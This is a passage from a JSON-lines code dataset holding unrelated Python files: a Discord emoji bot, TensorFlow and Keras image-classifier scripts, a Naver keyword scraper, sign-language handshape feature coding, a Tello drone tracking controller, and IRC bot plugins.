seeds.txtに1000行を出力\r\n unique_random_integers = random.sample(range(1, 1000000001), 1000) # 1000個のユニークな乱数を生成\r\n with open(\"my_seeds.txt\", \"w\") as file:\r\n for r in unique_random_integers:\r\n line = f\"{r} 0 0 {s*s}\\n\"\r\n file.write(line)\r\n\r\n # # cargoコマンドを実行\r\n subprocess.run([\"cargo\", \"run\", \"--release\", \"--bin\", \"gen\", \"my_seeds.txt\"])\r\n\r\n # ディレクトリ名を作成\r\n dir_name = f\"S{s:02d}\"\r\n print(dir_name)\r\n\r\n # ディレクトリが存在しない場合、作成\r\n if not os.path.exists(dir_name):\r\n os.makedirs(dir_name)\r\n\r\n # inディレクトリの中身をすべて移動\r\n src_dir = \"in\"\r\n for filename in os.listdir(src_dir):\r\n src_path = os.path.join(src_dir, filename)\r\n dest_path = os.path.join(dir_name, filename)\r\n shutil.move(src_path, dest_path)\r\n\r\n print(f\"Operation completed for s={s}\")\r\n","sub_path":"AtCoder/AHC022/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"35252868","text":"import math\nimport aiohttp\nimport discord\nfrom discord.ext import commands\nfrom extras.imgur import image_upload, image_delete\nfrom storage.db import Emoji as EmojiObj\nfrom storage.db import Guild\nfrom util.checks import no_private_message\n\nasync def _get_content_type(url):\n \"\"\"Checks page header and returns MIME content type.\"\"\"\n async with aiohttp.ClientSession() as session:\n async with session.head(url) as response:\n return response.headers.get('content-type')\n\n\nasync def _validate_url_image(url):\n \"\"\"Raises ValueError for unsupported content types.\"\"\"\n ctype = await _get_content_type(url)\n if(not ctype or not (ctype.startswith('image') or ctype.startswith('video'))):\n raise ValueError\n\n\ndef _emoji_embed(emoji):\n \"\"\"Generates a discord embed for an image.\"\"\"\n embed = discord.Embed()\n embed.set_image(url=emoji.url)\n embed.set_footer(text=emoji.name)\n return embed\n\n\nclass Emoji:\n def __init__(self, bot):\n self.bot = bot\n self.db = bot.database\n\n @commands.command(pass_context=True)\n @commands.check(no_private_message)\n async def emsave(self, ctx, name, url=None):\n \"\"\"Saves an emoji to my gallery. Can be a URL or direct attachment. Or you could just use this command right after an image is posted.\"\"\"\n # check if emoji exists\n e = self.db.get(EmojiObj, guild_id=ctx.message.server.id, name=name)\n if e:\n await ctx.bot.send_message(ctx.message.channel, '{} already exists'.format(name))\n return\n # attempt to find a valid image url\n try:\n if not url:\n # if url argument is missing, check attachments and message history\n if ctx.message.attachments:\n url = ctx.message.attachments[0]['url']\n else:\n async for log in ctx.bot.logs_from(ctx.message.channel, limit=1, before=ctx.message):\n if log.attachments:\n url = log.attachments[0]['url']\n else:\n url = log.content\n await _validate_url_image(url)\n except (TypeError, ValueError, discord.Forbidden, discord.NotFound, discord.HTTPException):\n await ctx.bot.send_message(ctx.message.channel, 'No valid image found.')\n return\n # upload image if found\n data = await image_upload(url)\n if 'error' in data:\n await ctx.bot.send_message(ctx.message.channel, '{}. Gallery copy failed: {}'.format(name, data['error']))\n else:\n e = EmojiObj(guild_id=ctx.message.server.id, name=name, url=data['link'])\n self.db.add(e)\n self.db.commit()\n await ctx.bot.send_message(ctx.message.channel, 'Saved {}.'.format(name))\n\n @commands.command(pass_context=True)\n @commands.check(no_private_message)\n async def em(self, ctx, name):\n \"\"\"Repost an emoji from my gallery.\"\"\"\n e = self.db.get(EmojiObj, guild_id=ctx.message.server.id, name=name)\n if e:\n await ctx.bot.send_message(ctx.message.channel, embed=_emoji_embed(e))\n\n @commands.command(pass_context=True)\n @commands.check(no_private_message)\n async def emdelete(self, ctx, name):\n \"\"\"Removes an emoji from my gallery.\"\"\"\n e = self.db.get(EmojiObj, guild_id=ctx.message.server.id, name=name)\n self.db.delete(e)\n self.db.commit()\n await ctx.bot.send_message(ctx.message.channel, \"Deleted {}\".format(name))\n\n @commands.command(pass_context=True)\n @commands.check(no_private_message)\n async def emlist(self, ctx):\n \"\"\"Lists all emojis from my gallery.\"\"\"\n emojis = self.db.getall(EmojiObj, guild_id=ctx.message.server.id)\n e = []\n for n in emojis:\n e.append(n.name)\n e.sort()\n\n max_e = len(e)\n row_e = int(math.ceil(max_e / 3))\n\n e1 = e[:row_e]\n e2 = e[row_e:row_e*2]\n e3 = e[row_e*2:]\n\n row1 = \"\"\n row2 = \"\"\n row3 = \"\"\n\n for x in e1:\n row1 += \"\\n\"+x\n\n for x in e2:\n row2 += \"\\n\"+x\n\n for x in e3:\n row3 += \"\\n\"+x\n\n H1 = (e1[0][0] + \" - \" + e1[len(e1)-1][0]).upper()\n H2 = (e2[0][0] + \" - \" + e2[len(e2)-1][0]).upper()\n H3 = (e3[0][0] + \" - \" + e3[len(e3)-1][0]).upper()\n\n embed = discord.Embed()\n\n embed.add_field(name=H1, value=row1, inline=True)\n embed.add_field(name=H2, value=row2, inline=True)\n embed.add_field(name=H3, value=row3, inline=True)\n\n await ctx.bot.send_message(ctx.message.channel, embed=embed)\n","sub_path":"extras/emoji.py","file_name":"emoji.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"233055614","text":"#coding=utf-8\n\nimport tensorflow as tf \nimport numpy as np \nimport pdb\nimport cv2\nimport os\nimport glob\nimport slim.nets.resnet_v2 as resnet\n\nfrom create_tf_record import *\nimport tensorflow.contrib.slim as slim\n\n\ndef predict(models_path,image_dir,labels_filename,labels_nums, data_format):\n [batch_size, resize_height, resize_width, depths] = data_format\n\n labels = np.loadtxt(labels_filename, str, delimiter='\\t')\n input_images = tf.placeholder(dtype=tf.float32, shape=[None, resize_height, resize_width, depths], name='input')\n\n with slim.arg_scope(resnet.resnet_arg_scope()):\n out, end_points = resnet.resnet_v2_50(inputs=input_images, num_classes=labels_nums, is_training=False)\n\n # 将输出结果进行softmax分布,再求最大概率所属类别\n score = tf.nn.softmax(out,name='pre')\n class_id = tf.argmax(score, 1)\n\n sess = tf.InteractiveSession()\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n saver.restore(sess, models_path)\n images_list=glob.glob(os.path.join(image_dir,'*.jpg'))\n score_total = 0\n for image_path in images_list:\n im=read_image(image_path,resize_height,resize_width,normalization=True)\n im=im[np.newaxis,:]\n #pred = sess.run(f_cls, feed_dict={x:im, keep_prob:1.0})\n pre_score,pre_label = sess.run([score,class_id], feed_dict={input_images:im})\n max_score=pre_score[0,pre_label]\n #print(\"{} is: pre labels:{},name:{} score: {}\".format(image_path, pre_label, labels[pre_label], max_score))\n if image_path.split(\".jpg\")[0].split(\"-\")[2] == labels[pre_label]:\n score_total += 1\n else:\n print(\"{} is predicted as label::{} \".format(image_path,labels[pre_label]))\n\n print(\"valuation accuracy is {}\".format(score_total/len(images_list)))\n sess.close()\n\n\nif __name__ == '__main__':\n\n class_nums=4\n image_dir='./onsets/test/B/'\n labels_filename='./onsets/label.txt'\n models_path='./models/onsets/resnet/model.ckpt-10000'\n\n batch_size = 1 #\n resize_height = 224 # 指定存储图片高度\n resize_width = 224 # 指定存储图片宽度\n depths=3\n data_format=[batch_size,resize_height,resize_width,depths]\n predict(models_path,image_dir, labels_filename, class_nums, data_format)\n","sub_path":"predict_resnet_onsets.py","file_name":"predict_resnet_onsets.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"4413684","text":"'''\r\n날짜 : 19-01-15\r\n내용 : 네이버 실검 크롤링\r\n'''\r\n\r\n\r\nimport requests as req\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom datetime import datetime\r\n\r\nres = req.get('http://naver.com')\r\ndom = bs(res.text, 'html.parser')\r\n\r\ntitles = dom.select(\"#PM_ID_ct > div.header > div.section_navbar > div.area_hotkeyword.PM_CL_realtimeKeyword_base > div.ah_roll.PM_CL_realtimeKeyword_rolling_base > div > ul > li > a > span.ah_k\")\r\n\r\n#for li in titles:\r\n# print(li.text)\r\n\r\n#파일생성\r\nfname = \"{:%y-%m-%d-%h-%M.txt}\".format(datetime.now())\r\nfile = open(fname, mode='w',encoding='utf-8')\r\n\r\n#파일쓰기\r\nfor tit in titles:\r\n file.write(tit.text+'\\n')\r\n\r\nfile.close()\r\n","sub_path":"2-5.py","file_name":"2-5.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"17085157","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: bhumihar\n\"\"\"\n\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras import applications\nfrom keras.utils import np_utils\n\n# dimensions of our images.\nimg_width, img_height = 150, 150\n\ndatagen = ImageDataGenerator(rescale=1. / 255)\n\ntop_model_weights_path = 'bottleneck_fc_model.h5'\ntrain_data_dir = '/home/bhumihar/Programming/Python/opencv/sample/project/Marcel-train' \nvalidation_data_dir = '/home/bhumihar/Programming/Python/opencv/sample/project/Marcel-test'\nnb_train_samples = 4872\nnb_validation_samples = 377\nepochs = 50\nbatch_size = 29\n\n # build the VGG16 network\ndef bottleneck_feature() :\n model = applications.VGG16(include_top=False, weights='imagenet')\n\n generator = datagen.flow_from_directory(\n train_data_dir,\n target_size=(150, 150),\n batch_size=batch_size,\n class_mode='categorical',\n shuffle=False) \n bottleneck_features_train = model.predict_generator(generator, nb_train_samples // batch_size,verbose=1)\n \n file = open('bottleneck_features_train.npy', 'wb')\n np.savez(file, bottleneck_features_train)\n \n generator = datagen.flow_from_directory(\n validation_data_dir,\n target_size=(150, 150),\n batch_size=batch_size,\n class_mode='categorical',\n shuffle=False)\n bottleneck_features_validation = model.predict_generator(generator, nb_validation_samples//batch_size,verbose=1)\n file = open('bottleneck_features_validation.npy', 'wb')\n np.savez(file, bottleneck_features_validation)\n \ndef train_top_model() :\n \n npyfile = np.load(\"bottleneck_features_train.npy\")\n a_size ,b_size,c_size,f_size,p_size,v_size = 1329,487,572,654,1395,435\n ac_size ,bc_size,cc_size,fc_size,pc_size,vc_size = 58,60,64,75,64,56\n train_data = npyfile['arr_0'] \n train_labels =np.array(([0] * int(a_size)) + ([1] * int(b_size)) + ([2] * int(c_size))\n + ([3] * int(f_size))+ ([4] * int(p_size))+ ([5] * int(v_size)))\n \n npyfile = np.load(\"bottleneck_features_validation.npy\")\n validation_data = npyfile['arr_0'] \n validation_labels = np.array(([0] * int(ac_size)) + ([1] * int(bc_size)) + ([2] * int(cc_size))\n + ([3] * int(fc_size))+ ([4] * int(pc_size))+ ([5] * int(vc_size)))\n \n \n train_labels = np_utils.to_categorical(train_labels, 6)\n validation_labels = np_utils.to_categorical(validation_labels, 6)\n model = Sequential()\n model.add(Flatten(input_shape=train_data.shape[1:]))\n model.add(Dense(256, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(6, activation='sigmoid'))\n \n model.compile(optimizer='rmsprop',\n loss='binary_crossentropy', metrics=['accuracy'])\n \n model.fit(train_data, train_labels,\n epochs=epochs,\n batch_size=batch_size,\n validation_data=(validation_data, validation_labels))\n model.save_weights(top_model_weights_path)\n \nbottleneck_feature() \ntrain_top_model() ","sub_path":"bottle_neck.py","file_name":"bottle_neck.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"648153982","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 30 13:17:54 2018\r\n\r\n@author: Jack\r\n\"\"\"\r\ndef get_Flexion(a):\r\n flexion = 1\r\n if len(a.split(\";\"))>1:\r\n b = a.split(\";\")[0]\r\n else:\r\n b = a\r\n if \"[\" in b:\r\n flexion+=1\r\n if \"<\" in b:\r\n flexion+=2\r\n if \"(\" in b:\r\n flexion+=3\r\n if \"C\" in b:\r\n flexion+=4\r\n if \"O\" in b:\r\n flexion+=5\r\n if \">\" in b:\r\n flexion+=5\r\n if \"@\" in b:\r\n flexion+=6\r\n return flexion\r\n\r\ndef get_thumb_flexion(a):\r\n flex = get_Flexion(a)\r\n if (a.find('T') < a.find(';')) and (\"-\" not in a):\r\n thumb_flex = 1\r\n elif (a.find('T') > a.find(';')) and (flex<3) and (\"-\" not in a):\r\n thumb_flex = 1\r\n elif (\"T-\" in a) and (flex==7):\r\n thumb_flex = 1\r\n elif \"T-\" in a:\r\n thumb_flex = -1\r\n else:\r\n thumb_flex = 0\r\n return thumb_flex\r\n\r\ndef get_NSFFlexion(a):\r\n #NSF flexion\r\n nsf_flexion=0\r\n if \"/\" in a: #extended\r\n nsf_flexion-=1\r\n if \"#\" in a: #closed\r\n nsf_flexion+=1\r\n return nsf_flexion\r\n\r\ndef get_nsfflexion_thumb(a):\r\n nsf_flexion = get_NSFFlexion(a)\r\n if \"T-\" in a:\r\n thumb = -1\r\n elif \"T\" in a:\r\n thumb = 1\r\n else:\r\n thumb = 0\r\n return thumb+nsf_flexion\r\n\r\n\r\ndef get_FingComplexity(a):\r\n compF = 0\r\n b = a.split(\" \")\r\n if len(b)>1:\r\n c = [x[0] for x in b]\r\n if len(set(c)) > 1:\r\n compF+=1\r\n #if a.split(\" \")[0][0] != a.split(\" \")[1][0]:\r\n #compF+=1\r\n a = b[0]\r\n if a.count(\";\") == 1:\r\n compF+= 2\r\n elif a.count(\";\") > 1:\r\n compF+= 3\r\n elif a[0] in [\"T\",\"B\",\"1\"]:\r\n compF+= 1\r\n elif a[0] in [\"J\",\"U\",\"8\"]:\r\n compF+= 2\r\n elif a[0] in [\"M\",\"P\",\"D\",\"H\",\"A\",\"2\",\"7\"]:\r\n compF+= 3\r\n else:\r\n compF = \"ERROR\"\r\n #compF = compF/len(a.split(\" \"))\r\n return compF\r\n\r\ndef get_JointComplexity(a):\r\n compJ = 0\r\n if \"K\" in a:\r\n compJ+= 3\r\n elif \"X\" in a:\r\n compJ+= 3\r\n elif \"<\" in a:\r\n compJ+= 2\r\n elif \">\" in a:\r\n compJ+= 2\r\n elif \"C\" in a:\r\n compJ+= 2\r\n elif \"O\" in a:\r\n compJ+= 2\r\n elif \"(\" in a:\r\n compJ+= 2\r\n elif \"[\" in a:\r\n compJ+= 2\r\n elif \"^\" in a:\r\n compJ+= 2\r\n else:\r\n compJ+= 1\r\n #compJ = compJ/len(a.split(\" \"))\r\n return compJ\r\n\r\ndef get_SelectedFing(a):\r\n selfing = \"\"\r\n if \"M\" in a:\r\n selfing+=\"imr\"\r\n if \"P\" in a:\r\n selfing+=\"mp\"\r\n if \"B\" in a:\r\n selfing+=\"imrp\"\r\n if \"D\" in a:\r\n selfing+=\"mrp\"\r\n if \"U\" in a:\r\n selfing+=\"im\"\r\n if \"H\" in a:\r\n selfing+=\"ip\"\r\n if \"A\" in a:\r\n selfing+=\"mr\"\r\n if \"2\" in a:\r\n selfing+=\"rp\"\r\n if \"1\" in a:\r\n selfing+=\"i\"\r\n if \"8\" in a:\r\n selfing+=\"m\"\r\n if \"7\" in a:\r\n selfing+=\"r\"\r\n if \"J\" in a:\r\n selfing+=\"p\"\r\n if \"T\" in a:\r\n selfing+=\"thumb\"\r\n return selfing \r\n\r\ndef get_apChange(a):\r\n b = a.split(\" \")\r\n apChange = 0\r\n if len(b) == 1:\r\n return apChange\r\n else:\r\n c = [get_Flexion(x) for x in b]\r\n for i in range(len(c)-1):\r\n diff = abs(c[i+1] - c[i])\r\n if diff > 3:\r\n apChange +=1\r\n break\r\n #print(c)\r\n if (apChange==0) and (abs(c[-1:][0] - c[0]) > 3):\r\n apChange +=1\r\n return apChange\r\n\r\ndef featureCoding(a):\r\n a = a.upper()\r\n b = a.split(\" \")[0]\r\n aperture_change = 0\r\n extra_point = 0\r\n if len(a.split(\" \"))>1:\r\n #flexion = []\r\n jointComp = []\r\n for x in a.split(\" \"):\r\n #flexion.append(get_Flexion(x))\r\n if \"K\" in x:\r\n jointComp.append(1)\r\n elif \"X\" in x:\r\n jointComp.append(1)\r\n else:\r\n jointComp.append(0)\r\n #for i in range(len(flexion)-1):\r\n #diff = abs(flexion[i+1] - flexion[i])\r\n #if diff > 3:\r\n #aperture_change+=1\r\n #break\r\n if sum(jointComp) != len(a.split(\" \")):\r\n if sum(jointComp) != 0:\r\n extra_point+=1\r\n \r\n\r\n compF = get_FingComplexity(a)\r\n compJ = get_JointComplexity(b) + aperture_change + extra_point\r\n flexion = get_Flexion(b)\r\n nsf_flexion = get_NSFFlexion(b)\r\n selfing = get_SelectedFing(b)\r\n aperture_change = get_apChange(a)\r\n nsf_thumb = get_nsfflexion_thumb(b) \r\n thumb_flex = get_thumb_flexion(b) \r\n\r\n return compF,compJ,flexion,nsf_flexion,selfing,aperture_change,nsf_thumb,thumb_flex\r\n","sub_path":"convert_handshape_to_features.py","file_name":"convert_handshape_to_features.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"614988941","text":"# -*- coding: utf-8 -*-\n# Frame_1 : 获取Tello的摄像头\n# Frame_2 : 获取Tello的摄像头,并用矩形表示绿色物体\n# flag=1时可手动控制Tello\n# flag=2时可对绿色物体进行自动追踪(x坐标)\n\nfrom collections import deque\nfrom cv2 import cv2\nimport numpy as np \nimport time\nimport math\nimport socket\n\n# 字体大小\nFONT_SIZE = 0.5\n\n# 创建UDP套接字\nsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# ステータス受信用のUDPサーバの設定\nLOCAL_IP = \"\" # \"0.0.0.0\"と同じ意味.すなわち「全てのネットワークインターフェイスを使う」\nLOCAL_PORT = 8890 # ステータス受信は8890ポート\nsocket.bind((LOCAL_IP, LOCAL_PORT))\n\n# ビデオ受信用のUDPサーバの設定\nLOCAL_IP = \"\" # 同\"0.0.0.0\"\nLOCAL_PORT_VIDEO = 11111\naddress = \"udp://\" + LOCAL_IP + \":\" + str(LOCAL_PORT_VIDEO)\n\n# コマンド送信用の設定\nTELLO_IP = \"192.168.10.1\"\nTELLO_PORT = 8889\ntello_address = (TELLO_IP, TELLO_PORT)\n\n# 最初に\"command\"を送ってSDKモードを開始しないとステータスが出てこない\nsocket.sendto(\"command\".encode(\"utf-8\"),tello_address)\nsocket.sendto(\"streamon\".encode(\"utf-8\"),tello_address)\ncamera = cv2.VideoCapture(address)\n\n# 设置绿色阈值,HSV空间 色调(H),饱和度(S),明度(V)\ngreenLower = np.array([35, 43, 46])\ngreenUpper = np.array([99, 255, 255])\n\n# 初始化追踪点的列表\nmybuffer = 30\npts = deque(maxlen=mybuffer)\n\n# 获取(640,480)的Frame大小,Tello摄像头原大小为(960,720)\nframe_width = int(camera.get(cv2.CAP_PROP_FRAME_WIDTH)/1.5)\nframe_height = int(camera.get(cv2.CAP_PROP_FRAME_HEIGHT)/1.5)\nframe_size = (frame_width, frame_height) \nprint(\"Frame Size:\"+repr(frame_size))\n\n# 窗口中心点\nframe_center_x = int(frame_width/2)\nframe_center_y = int(frame_height/2)\nframe_center = (frame_center_x, frame_center_y)\n\n# 初始化marker坐标\nmarker_center_x = 0\nmarker_center_y = 0\n\n# 计算FPS用的变数\nfps = 0\nfps_cnt_frame = 0\nstart_time = time.time()\nrun_time = time.time()\n\n# 通信が安定するまでちょっと待つ\ntime.sleep(1)\n\n# フレーム枚数をカウントする変数\ncommand_cnt_frame = 0 \n\n# 現在時刻の保存変数\ncurrent_time = time.time()\n\n# 5秒ごとの\"command\"送信のための時刻変数\npre_time = current_time \n\n# flag=1时手动控制,flag=2时自动移动\nflag = 1 \n\nwhile(camera.isOpened()):\n\n # 读取视频流\n ret,frame = camera.read()\n\n if not ret:\n print(\"No camera\") \n break\n\n # 将Frame大小调整到(640,480)\n frame = cv2.resize(frame, dsize = (frame_width,frame_height))\n\n # 复制两个Frame\n original_frame = frame\n perform_frame = frame\n\n # 显示未经处理的Frame\n cv2.imshow(\"Original Frame\",original_frame)\n cv2.moveWindow(\"Original Frame\", 50, 100)\n \n # 计算FPS\n fps_cnt_frame = fps_cnt_frame + 1\n end_time = time.time()\n diff_time = end_time - start_time\n if (diff_time > 1):\n fps = fps_cnt_frame\n fps_cnt_frame = 0\n start_time = end_time\n\n # 显示FPS\n cv2.putText(perform_frame, \"FPS: \" + str(fps),(10,30),cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n\n # battery = socket.sendto(\"battery?\".encode(\"utf-8\"),tello_address)\n # battery = int(battery)\n # cv2.putText(perform_frame, \"Battery: \" + str(battery) + \"%\",(10,90),cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n \n # 输出运行时间\n t = round(time.time() - run_time,3)\n tm = (f\"Time: {t}\")\n cv2.putText(perform_frame, tm, (10, 60), cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n\n # 加上下面这段会产生很大延迟\n # 受信は最大1024バイトまで.受信結果はresponse変数に入る\n # data, addr = socket.recvfrom(1024)\n \n # if data == \"ok\": # 受信データがokだけだったら再ループ\n # continue\n\n # data = str(data).split(\";\") \n \n # try:\n # bat = data[15].replace(\"bat\",\"Battery\")+(\" %\") \n # h = data[16].replace(\"baro\",\"Height\")+(\" cm\") \n # except IndexError:\n # continue\n \n # 图像,文字内容,坐标,字体,大小,颜色,字体厚度\n # cv2.putText(perform_frame, bat, (10, 60), cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n # cv2.putText(perform_frame, h, (10, 90), cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n\n # 画出frame中心点\n cv2.circle(perform_frame, frame_center , 2, (26,101,231) , -1)\n\n if command_cnt_frame > 5:\n\n # 用cv2.COLOR_BGR2HSV将frame转向HSV空间\n perform_hsv = cv2.cvtColor(perform_frame, cv2.COLOR_BGR2HSV)\n \n # 根据阈值构建掩膜,将低于greenLower和高于greenUpper的部分分别变成0,greenLower和greenUpper之间的值变成255\n perform_mask = cv2.inRange(perform_hsv, greenLower, greenUpper)\n\n # 在上面基础上再进行腐蚀操作,可以使得图像的色彩更加突出\n perform_erode = cv2.erode(perform_mask, None, iterations=2)\n\n # 开运算(オープニング)闭运算(クロージング)\n # 在上面基础上再膨胀操作,先腐蚀再膨胀的效果是为了开运算,去除噪点 \n perform_dilate = cv2.dilate(perform_erode, None, iterations=2) \n\n # 轮廓检测\n perform_cnts = cv2.findContours(perform_dilate, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]\n\n # 初始化轮廓质心 \n marker_center = None \n\n # 如果存在轮廓\n if len(perform_cnts) > 0:\n\n # 找到面积最大的轮廓\n c = max(perform_cnts, key = cv2.contourArea)\n\n # 确定面积最大的轮廓的矩形\n x,y,w,h = cv2.boundingRect(c)\n #print(x,y,w,h)\n\n diagonal = math.sqrt((w^2+h^2))\n #print(diagonal)\n\n # 计算面积最大的轮廓的矩\n M = cv2.moments(c)\n \n # 计算质心\n marker_center_x = int(M[\"m10\"]/M[\"m00\"])\n marker_center_y = int(M[\"m01\"]/M[\"m00\"])\n marker_center = (marker_center_x, marker_center_y)\n \n # print(f\"marker_center = ({marker_center_x},{marker_center_y})\")\n\n # 只有当对角线大于5时,才执行画图\n if diagonal > 5:\n\n # 画外部矩形\n cv2.rectangle(perform_frame, (int(x),int(y)), (int(x+w),int(y+h)), (248,147,29), 2)\n\n # 画质心\n cv2.circle(perform_frame, marker_center, 2, (0,0,255), -1)\n\n # 把质心添加到pts中,并且是添加到列表左侧\n pts.appendleft(marker_center)\n \n # 遍历追踪点,分段画出轨迹 \n # for i in range(1, len(pts)):\n\n # if pts[i-1] is None or pts[i] is None:\n # continue\n\n # # 计算所画小线段的粗细\n # thickness = int(np.sqrt(mybuffer/float(i+1)*6.5))\n\n # # 画出小线段 \n # cv2.line(frame, pts[i-1], pts[i], (0,0,255), thickness)\n\n # フレーム枚数をリセット\n command_cnt_frame = 0 \n\n # 画面中心との差分\n center_diff = frame_center_x - marker_center_x\n dx = 0.1 * center_diff\n dx = -dx\n\n d = 0 if abs(center_diff) < 10.0 else dx \n # d = 80 if d > 80.0 else d\n # d = -80 if d < -80.0 else d\n # print(\"d = \"+str(d))\n\n center_diff = int(center_diff)\n d = int(d)\n cv2.putText(perform_frame, \"Diff: \" + str(center_diff), (10, 90), cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n cv2.putText(perform_frame, \"d: \" + str(d), (10, 120), cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n\n if(flag == 2 and d != 0):\n \n #socket.sendto(\"cw 10\".encode(\"utf-8\"),tello_address)\n socket.sendto((f\"rc {d} 0 0 0\").encode(\"utf-8\"),tello_address)\n print(f\"Move {d} 0 0 0\")\n\n # 镜像翻转\n # frame = cv2.flip(frame ,1) \n\n # フレームを+1枚\n command_cnt_frame += 1\n\n # 显示处理过的Frame\n cv2.imshow(\"Perform Frame\",perform_frame)\n cv2.moveWindow(\"Perform Frame\", 750, 100)\n\n # 現在時刻を取得\n current_time = time.time() \n\n # 前回時刻から5秒以上経過しているか?\n if current_time - pre_time > 4.0 : \n\n # \"command\"送信\n socket.sendto(\"command\".encode(\"utf-8\"),tello_address) \n\n # 前回時刻を更新p\n pre_time = current_time \n\n # 按\"q\"健退出循环 \n\n key = cv2.waitKey(1) & 0xFF\n\n if key == ord(\"p\"): \n print(\"Exit\")\n break \n\n elif key == ord(\"1\"):\n flag = 1 \n socket.sendto(\"rc 0 0 0 0\".encode(\"utf-8\"),tello_address) \n print(\"Manual\")\n\n elif key == ord(\"2\"):\n flag = 2\n print(\"Automatic\")\n\n elif key == ord(\"t\"):\n # socket.sendto(\"command\".encode(\"utf-8\"),tello_address)\n socket.sendto(\"takeoff\".encode(\"utf-8\"),tello_address)\n print(\"Take off\")\n time.sleep(0.5)\n\n elif key == ord(\"l\"):\n flag = 1\n socket.sendto(\"rc 0 0 0 0\".encode(\"utf-8\"),tello_address) \n socket.sendto(\"land\".encode(\"utf-8\"),tello_address)\n print(\"Land\")\n time.sleep(1)\n\n elif key == ord(\"r\"):\n socket.sendto(\"up 50\".encode(\"utf-8\"),tello_address) \n print(\"Up\")\n\n elif key == ord(\"f\"):\n socket.sendto(\"down 20\".encode(\"utf-8\"),tello_address) \n print(\"Down\") \n \n elif key == ord(\"w\"):\n socket.sendto(\"forward 20\".encode(\"utf-8\"),tello_address)\n print(\"Forward\") \n\n elif key == ord(\"s\"):\n socket.sendto(\"back 20\".encode(\"utf-8\"),tello_address) \n print(\"Back\")\n\n elif key == ord(\"a\"):\n socket.sendto(\"left 20\".encode(\"utf-8\"),tello_address) \n print(\"Left\")\n \n elif key == ord(\"d\"):\n socket.sendto(\"right 20\".encode(\"utf-8\"),tello_address) \n print(\"Right\") \n\n elif key == ord(\"q\"):\n socket.sendto(\"cw 20\".encode(\"utf-8\"),tello_address) \n print(\"Clockwise\")\n\n elif key == ord(\"e\"):\n socket.sendto(\"ccw 20\".encode(\"utf-8\"),tello_address) \n print(\"Counterclockwise\")\n\n# 关闭摄像头 \nsocket.sendto(\"streamoff\".encode(\"utf-8\"),tello_address)\n\n# 摄像头释放 \ncamera.release()\n\n#销毁所有窗口\ncv2.destroyAllWindows()","sub_path":"Past/Tello_5.py","file_name":"Tello_5.py","file_ext":"py","file_size_in_byte":10362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"143037185","text":"# -*- coding: utf-8 -*-\n# @Author : llc\n# @Time : 2020/3/6 15:47\n\nfrom app import create_app\n\napplication = create_app()\n\nif __name__ == '__main__':\n application.run(host='0.0.0.0', port=8000, debug=True)\n","sub_path":"src/app/webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"172221155","text":"import re\nimport json\nfrom kaarmebot.plugin import plugin_config\nfrom kaarmebot import irc\nfrom urllib import urlopen\nfrom urlparse import parse_qs\n\n\n@plugin_config(name=\"echo\")\ndef echo_to_source(request):\n message = request.message\n d = re.match('(?P<nick>.*): (?P<msg>.*)', message.body).groupdict()\n msg = d.get('msg')\n nick = d.get('nick')\n my_nick = request.source_settings.get('nick')\n target = message.parameters[0]\n source = irc.string_to_person(message.name).nick\n if msg and nick == my_nick:\n if target != nick:\n return irc.privmsg(target, \"%s: %s\" % (source, msg))\n else:\n return irc.privmsg(source, \"%s: %s\" % (source, msg))\n return None\n\n\n@plugin_config(name=\"utube\")\ndef utube(request):\n message = request.message\n target = message.parameters[0]\n vid = get_youtube_video_id_from_url(message.body)\n if vid:\n url = ''.join(('https://gdata.youtube.com/feeds/api/videos/',\n vid, '?v=2&alt=json'))\n res = urlopen(url).read()\n d = json.loads(res)\n title = d['entry']['title']['$t']\n return irc.privmsg(target, \"YouTube: %s\" % title)\n return None\n\n\ndef get_youtube_video_id_from_url(contents):\n short_url_match = re.match('.*https?://youtu\\.be/(?P<vid>[^\\s]+).*',\n contents)\n if short_url_match:\n return short_url_match.groupdict().get('vid')\n\n long_url_match = re.match(\n '.*https?://[.\\w]*youtube\\.com/watch\\?(?P<path>[^\\s]+).*',\n contents)\n\n if long_url_match:\n return parse_qs(long_url_match.groupdict().get('path', '')).get('v')[0]\n\n return None\n","sub_path":"example_plugin.py","file_name":"example_plugin.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} 